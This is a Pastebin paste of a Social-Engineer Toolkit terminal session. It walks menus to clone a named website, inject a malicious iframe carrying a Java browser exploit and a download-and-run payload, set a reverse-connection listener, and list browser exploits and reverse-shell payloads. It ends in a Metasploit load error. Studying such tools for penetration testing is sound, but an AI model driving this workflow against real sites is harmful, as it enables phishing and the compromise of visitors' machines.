API tools faq
paste
Advertisement
Guest User

SET Output

a guest
Apr 13th, 2013
141
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 12.89 KB | None | 0 0
raw download clone embed print report
  1. ..######..########.########
  2. .##....##.##..........##...
  3. .##.......##..........##...
  4. ..######..######......##...
  5. .......##.##..........##...
  6. .##....##.##..........##...
  7. ..######..########....##...
  8.  
  9. [---] The Social-Engineer Toolkit (SET) [---]
  10. [---] Created by: David Kennedy (ReL1K) [---]
  11. [---] Version: 4.7.2 [---]
  12. [---] Codename: 'Headshot' [---]
  13. [---] Follow us on Twitter: @trustedsec [---]
  14. [---] Follow me on Twitter: @dave_rel1k [---]
  15. [---] Homepage: https://www.trustedsec.com [---]
  16.  
  17. Welcome to the Social-Engineer Toolkit (SET). The one
  18. stop shop for all of your social-engineering needs.
  19.  
  20. Join us on irc.freenode.net in channel #setoolkit
  21.  
  22. The Social-Engineer Toolkit is a product of TrustedSec.
  23.  
  24. Visit: https://www.trustedsec.com
  25.  
  26. Select from the menu:
  27.  
  28. 1) Social-Engineering Attacks
  29. 2) Fast-Track Penetration Testing
  30. 3) Third Party Modules
  31. 4) Update the Metasploit Framework
  32. 5) Update the Social-Engineer Toolkit
  33. 6) Update SET configuration
  34. 7) Help, Credits, and About
  35.  
  36. 99) Exit the Social-Engineer Toolkit
  37.  
  38. set> 1
  39.  
  40. 01011001011011110111010100100000011100
  41. 10011001010110000101101100011011000111
  42. 10010010000001101000011000010111011001
  43. 10010100100000011101000110111100100000
  44. 01101101011101010110001101101000001000
  45. 00011101000110100101101101011001010010
  46. 00000110111101101110001000000111100101
  47. 10111101110101011100100010000001101000
  48. 01100001011011100110010001110011001000
  49. 00001110100010110100101001001000000101
  50. 01000110100001100001011011100110101101
  51. 11001100100000011001100110111101110010
  52. 00100000011101010111001101101001011011
  53. 10011001110010000001110100011010000110
  54. 01010010000001010011011011110110001101
  55. 10100101100001011011000010110101000101
  56. 01101110011001110110100101101110011001
  57. 01011001010111001000100000010101000110
  58. 11110110111101101100011010110110100101
  59. 11010000100000001010100110100001110101
  60. 011001110111001100101010
  61.  
  62. [---] The Social-Engineer Toolkit (SET) [---]
  63. [---] Created by: David Kennedy (ReL1K) [---]
  64. [---] Version: 4.7.2 [---]
  65. [---] Codename: 'Headshot' [---]
  66. [---] Follow us on Twitter: @trustedsec [---]
  67. [---] Follow me on Twitter: @dave_rel1k [---]
  68. [---] Homepage: https://www.trustedsec.com [---]
  69.  
  70. Welcome to the Social-Engineer Toolkit (SET). The one
  71. stop shop for all of your social-engineering needs.
  72.  
  73. Join us on irc.freenode.net in channel #setoolkit
  74.  
  75. The Social-Engineer Toolkit is a product of TrustedSec.
  76.  
  77. Visit: https://www.trustedsec.com
  78.  
  79. Select from the menu:
  80.  
  81. 1) Spear-Phishing Attack Vectors
  82. 2) Website Attack Vectors
  83. 3) Infectious Media Generator
  84. 4) Create a Payload and Listener
  85. 5) Mass Mailer Attack
  86. 6) Arduino-Based Attack Vector
  87. 7) SMS Spoofing Attack Vector
  88. 8) Wireless Access Point Attack Vector
  89. 9) QRCode Generator Attack Vector
  90. 10) Powershell Attack Vectors
  91. 11) Third Party Modules
  92.  
  93. 99) Return back to the main menu.
  94.  
  95. set> 2
  96.  
  97. The Web Attack module is a unique way of utilizing multiple web-based attacks
  98. in order to compromise the intended victim.
  99.  
  100. The Java Applet Attack method will spoof a Java Certificate and deliver a
  101. metasploit based payload. Uses a customized java applet created by Thomas
  102. Werth to deliver the payload.
  103.  
  104. The Metasploit Browser Exploit method will utilize select Metasploit
  105. browser exploits through an iframe and deliver a Metasploit payload.
  106.  
  107. The Credential Harvester method will utilize web cloning of a web-
  108. site that has a username and password field and harvest all the
  109. information posted to the website.
  110.  
  111. The TabNabbing method will wait for a user to move to a different
  112. tab, then refresh the page to something different.
  113.  
  114. The Man Left in the Middle Attack method was introduced by Kos and
  115. utilizes HTTP REFERER's in order to intercept fields and harvest
  116. data from them. You need to have an already vulnerable site and in-
  117. corporate <script src="http://YOURIP/">. This could either be from a
  118. compromised site or through XSS.
  119.  
  120. The Web-Jacking Attack method was introduced by white_sheep, Emgent
  121. and the Back|Track team. This method utilizes iframe replacements to
  122. make the highlighted URL link to appear legitimate however when clicked
  123. a window pops up then is replaced with the malicious link. You can edit
  124. the link replacement settings in the set_config if its too slow/fast.
  125.  
  126. The Multi-Attack method will add a combination of attacks through the web attack
  127. menu. For example you can utilize the Java Applet, Metasploit Browser,
  128. Credential Harvester/Tabnabbing, and the Man Left in the Middle attack
  129. all at once to see which is successful.
  130.  
  131. 1) Java Applet Attack Method
  132. 2) Metasploit Browser Exploit Method
  133. 3) Credential Harvester Attack Method
  134. 4) Tabnabbing Attack Method
  135. 5) Man Left in the Middle Attack Method
  136. 6) Web Jacking Attack Method
  137. 7) Multi-Attack Web Method
  138. 8) Create or import a CodeSigning Certificate
  139.  
  140. 99) Return to Main Menu
  141.  
  142. set:webattack>2
  143.  
  144. The first method will allow SET to import a list of pre-defined web
  145. applications that it can utilize within the attack.
  146.  
  147. The second method will completely clone a website of your choosing
  148. and allow you to utilize the attack vectors within the completely
  149. same web application you were attempting to clone.
  150.  
  151. The third method allows you to import your own website, note that you
  152. should only have an index.html when using the import website
  153. functionality.
  154.  
  155. 1) Web Templates
  156. 2) Site Cloner
  157. 3) Custom Import
  158.  
  159. 99) Return to Webattack Menu
  160.  
  161. set:webattack>2
  162. [-] NAT/Port Forwarding can be used in the cases where your SET machine is
  163. [-] not externally exposed and may be a different IP address than your reverse listener.
  164. set> Are you using NAT/Port Forwarding [yes|no]: no
  165. [-] Enter the IP address of your interface IP or if your using an external IP, what
  166. [-] will be used for the connection back and to house the web server (your interface address)
  167. 2.168.1.55ack> IP address or hostname for the reverse connection:19
  168. [-] SET supports both HTTP and HTTPS
  169. [-] Example: http://www.thisisafakesite.com
  170. set:webattack> Enter the url to clone:http://www.tblop.com
  171.  
  172. Enter the browser exploit you would like to use [8]:
  173.  
  174. 1) Java Applet JMX Remote Code Execution (UPDATED 2013-01-19)Java Applet JMX Remote Code Execution (2013-01-10)
  175. 2) Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free (2012-12-27)
  176. 3) Java 7 Applet Remote Code Execution (2012-08-26)
  177. 4) Microsoft Internet Explorer execCommand Use-After-Free Vulnerability (2012-09-14)
  178. 5) Java AtomicReferenceArray Type Violation Vulnerability (2012-02-14)
  179. 6) Java Applet Field Bytecode Verifier Cache Remote Code Execution (2012-06-06)
  180. 7) MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption (2012-06-12)
  181. 8) Microsoft XML Core Services MSXML Uninitialized Memory Corruption (2012-06-12)
  182. 9) Adobe Flash Player Object Type Confusion (2012-05-04)
  183. 10) Adobe Flash Player MP4 "cprt" Overflow (2012-02-15)
  184. 11) MS12-004 midiOutPlayNextPolyEvent Heap Overflow (2012-01-10)
  185. 12) Java Applet Rhino Script Engine Remote Code Execution (2011-10-18)
  186. 13) MS11-050 IE mshtml!CObjectElement Use After Free (2011-06-16)
  187. 14) Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability (2011-04-11)
  188. 15) Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute (2011-06-01)
  189. 16) Internet Explorer CSS Import Use After Free (2010-11-29)
  190. 17) Microsoft WMI Administration Tools ActiveX Buffer Overflow (2010-12-21)
  191. 18) Internet Explorer CSS Tags Memory Corruption (2010-11-03)
  192. 19) Sun Java Applet2ClassLoader Remote Code Execution (2011-02-15)
  193. 20) Sun Java Runtime New Plugin docbase Buffer Overflow (2010-10-12)
  194. 21) Microsoft Windows WebDAV Application DLL Hijacker (2010-08-18)
  195. 22) Adobe Flash Player AVM Bytecode Verification Vulnerability (2011-03-15)
  196. 23) Adobe Shockwave rcsL Memory Corruption Exploit (2010-10-21)
  197. 24) Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow (2010-09-07)
  198. 25) Apple QuickTime 7.6.7 Marshaled_pUnk Code Execution (2010-08-30)
  199. 26) Microsoft Help Center XSS and Command Execution (2010-06-09)
  200. 27) Microsoft Internet Explorer iepeers.dll Use After Free (2010-03-09)
  201. 28) Microsoft Internet Explorer "Aurora" Memory Corruption (2010-01-14)
  202. 29) Microsoft Internet Explorer Tabular Data Control Exploit (2010-03-0)
  203. 30) Microsoft Internet Explorer 7 Uninitialized Memory Corruption (2009-02-10)
  204. 31) Microsoft Internet Explorer Style getElementsbyTagName Corruption (2009-11-20)
  205. 32) Microsoft Internet Explorer isComponentInstalled Overflow (2006-02-24)
  206. 33) Microsoft Internet Explorer Explorer Data Binding Corruption (2008-12-07)
  207. 34) Microsoft Internet Explorer Unsafe Scripting Misconfiguration (2010-09-20)
  208. 35) FireFox 3.5 escape Return Value Memory Corruption (2009-07-13)
  209. 36) FireFox 3.6.16 mChannel use after free vulnerability (2011-05-10)
  210. 37) Metasploit Browser Autopwn (USE AT OWN RISK!)
  211.  
  212. set:payloads>1
  213.  
  214.  
  215. 1) Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker
  216. 2) Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker
  217. 3) Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker
  218. 4) Windows Bind Shell Execute payload and create an accepting port on remote system.
  219. 5) Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline
  220. 6) Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline
  221. 7) Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter
  222. 8) Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a port home via multiple ports
  223. 9) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter
  224. 10) Windows Meterpreter Reverse DNS Use a hostname instead of an IP address and use Reverse Meterpreter
  225. 11) Download/Run your Own Executable Downloads an executable and runs it
  226.  
  227. set:payloads>11
  228. [*] Selecting Java Meterpreter as payload since it is exploit specific.
  229. set:payloads> Port to use for the reverse [443]:4242
  230.  
  231. [*] Cloning the website: http://www.tblop.com
  232. [*] This could take a little bit...
  233. [*] Injecting iframes into cloned website for MSF Attack....
  234. [*] Malicious iframe injection successful...crafting payload.
  235.  
  236. [*] Apache appears to be running, moving files into Apache's home
  237.  
  238. ***************************************************
  239. Web Server Launched. Welcome to the SET Web Attack.
  240. ***************************************************
  241.  
  242. [--] Tested on Windows, Linux, and OSX [--]
  243. [--] Apache web server is currently in use for performance. [--]
  244. [*] Moving payload into cloned website.
  245. [*] The site has been moved. SET Web Server is now listening..
  246. [-] Launching MSF Listener...
  247. [-] This may take a few to load MSF...
  248. /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require': no such file to load -- rubygems (LoadError)
  249. from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
  250. from <internal:gem_prelude>:158:in `load_full_rubygems_library'
  251. from <internal:gem_prelude>:270:in `const_missing'
  252. from /opt/metasploit/apps/pro/msf3/lib/msf/sanity.rb:40:in `<top (required)>'
  253. from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
  254. from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
  255. from /opt/metasploit/apps/pro/msf3/lib/msf/core.rb:14:in `<top (required)>'
  256. from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
  257. from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
  258. from /opt/metasploit/apps/pro/msf3/lib/msf/ui/console/driver.rb:2:in `<top (required)>'
  259. from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
  260. from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
  261. from /opt/metasploit/apps/pro/msf3/lib/msf/ui/console.rb:11:in `<top (required)>'
  262. from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
  263. from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
  264. from /opt/metasploit/apps/pro/msf3/lib/msf/ui.rb:11:in `<top (required)>'
  265. from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
  266. from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
  267. from /opt/metasploit/apps/pro/msf3//msfconsole:136:in `<main>'
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!